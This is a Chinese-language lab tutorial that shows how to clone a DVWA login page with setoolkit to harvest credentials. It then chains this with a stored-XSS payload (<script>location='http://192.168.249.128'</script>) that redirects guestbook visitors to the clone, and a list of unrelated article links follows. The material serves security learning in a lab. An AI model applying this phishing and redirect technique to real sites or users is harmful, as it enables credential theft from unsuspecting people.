当前位置: 首页 > news >正文

使用setoolkit制作钓鱼网站并结合dvwa靶场储存型XSS漏洞利用

setoolkit是一款kali自带的工具

使用命令启动

setoolkit

1) Social-Engineering Attacks                     1) 社会工程攻击
2) Penetration Testing (Fast-Track)             2) 渗透测试(快速通道)
3) Third Party Modules                                3) 第三方模块 
4) Update the Social-Engineer Toolkit         4) 更新社会工程师工具包
5) Update SET configuration                       5) 更新集配置  
6) Help, Credits, and About                         6)使用帮助及相关信息
99) Exit the Social-Engineer Toolkit            99)退出社会工程师工具包 

该工具有很多功能,这里介绍钓鱼网站

键入1回车,选择 Social-Engineering Attacks 

键入2回车,选择 Website Attack Vectors

键入3回车,选择 Credential Harvester Attack Method 

键入2回车,选择 Site Cloner(网站克隆)

此时需要设置一个属于是监听的ip,即我们kali的ip地址(也就是它括号里推荐的ip)

键入kali的ip地址:192.168.249.128,回车

提示需要输入克隆网站的URL,我这里以dvwa靶场的登录页面为例

对应url为:http://192.168.249.129:89/login.php

输入URL并回车,回显如下:

此时如果我们访问kali的ip地址,出来的便是dvwa靶场的登录页面

查看kali,已经产生访问记录

 如果用户不知情,没有注意URL的差异,而是单纯看页面样子一样,就直接进行登录

输入用户名和密码后登录,发现请求无回显

(注意观察url,此时已经跳回到了正确靶场登录界面的URL,也就是说下次用户即可正常登录)

此时kali已经记录到刚才用户的用户名和密码

此时用户以为自己输错了密码,于是重新登录,即可登录成功

(用户几乎不会有任何察觉密码已经泄露)

那么我们结合dvwa的储存型XSS来进行漏洞利用

在储存型XSS处插入下面代码

<script>location='http://192.168.249.128'</script>

该代码可以实现网页直接跳转,跳转的位置即为我们刚才克隆好的钓鱼网站地址

关于XSS漏洞可以参考我之前对皮卡丘靶场的讲解:

Pikachu(皮卡丘靶场)初识XSS(常见标签事件及payload总结)

http://t.csdnimg.cn/QJ8MF

插入恶意代码

提交之后则会直接跳转到我们的钓鱼网站

同样会进行记录

只要有人访问了那个留言板的页面(xss储存型靶场)都会产生跳转和记录 

http://www.lryc.cn/news/270361.html

相关文章:

  • 计算机组成原理-总线概述
  • 三角函数两角和差公式推导
  • HarmonyOS page生命周期函数讲解
  • 3D视觉-结构光测量-线结构光测量
  • ssm基于web的马病管理系统设计与实现+jsp论文
  • SaaS版Java基层健康卫生云HIS信息管理平台源码(springboot)
  • redis,memcached,nginx网络组件,网络编程——reactor的应用
  • 【机电、机器人方向会议征稿|不限专业|见刊快】2024年机械、 图像与机器人国际会议(IACMIR 2024)
  • uniapp学习之路
  • 移动开发新的风口?Harmony4.0鸿蒙应用开发基础+实践案例
  • QT上位机开发(倒计时软件)
  • 2023 楚慧杯 --- Crypto wp
  • Python+OpenCV 零基础学习笔记(1-3):anaconda+vscode+jupyter环境配置
  • Spring Cloud Gateway 常见过滤器的基本使用
  • maven依赖无法传递问题排查
  • JVM钩子
  • linux cat命令增加-f显示文件名功能
  • linux更改登录shell
  • 【JS】报错:Uncaught TypeError: Cannot read properties of null (reading ‘classList‘)
  • kali2.0安装VMware Tools 和自定义改变分辨率
  • redis中根据通配符删除key
  • 【HDFS联邦(2)】HDFS Router-based Federation官网解读:HDFSRouterFederation的架构、各组件基本原理
  • 【头歌实训】Spark 完全分布式的安装和部署
  • Leetcode—86.分隔链表【中等】
  • 淘宝/天猫商品API:实时数据获取与安全隐私保护的指南
  • 使用 SSH 方式实现 Git 远程连接GitHub
  • Centos7部署Keepalived+lvs服务
  • 12/31
  • python使用openpyxl为excel模版填充数据,生成多个Sheet页面
  • 基于ssm的4S店预约保养系统开发+vue论文